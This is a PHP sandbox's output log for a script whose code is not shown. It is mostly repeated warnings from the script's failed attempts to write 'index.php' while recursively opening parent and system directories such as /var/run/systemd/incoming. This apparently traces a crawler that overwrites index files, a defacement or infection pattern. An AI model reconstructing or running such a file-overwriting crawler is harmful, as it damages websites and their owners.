Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parame
Process exited with code 137.
Output for 5.6.40, 7.0.0 - 7.0.33, 7.1.0 - 7.1.33, 7.2.0 - 7.2.34
Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: opendir(../../var/run/systemd/incoming): failed to open dir: Permission denied in /in/q7qZT on line 15 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: opendir(../../dev/fd/3/var/run/systemd/incoming): failed to open dir: Permission denied in /in/q7qZT on line 15 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: opendir(../../dev/fd/3/dev/fd/3/var/run/systemd/incoming): failed to open dir: Permission denied in /in/q7qZT on line 15 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: opendir(../../dev/fd/3/dev/fd/3/dev/fd/3/var/run/systemd/incoming): failed to open dir: Permission denied in /in/q7qZT on line 15 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12
Process exited with code 137.
Output for 5.4.32 - 5.4.45, 5.5.24 - 5.5.35, 5.6.8 - 5.6.28
Notice: Undefined index: HTTP_HOST in /in/q7qZT on line 3 Notice: Undefined index: REQUEST_URI in /in/q7qZT on line 3 Warning: fopen(index.php): failed to open stream: Permission denied in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, boolean given in /in/q7qZT on line 12 Warning: opendir(../..): failed to open dir: Permission denied in /in/q7qZT on line 15 Notice: Undefined variable: counter in /in/q7qZT on line 56 Warning: Cannot modify header information - headers already sent by (output started at /in/q7qZT:3) in /in/q7qZT on line 58
Output for 5.4.0 - 5.4.31
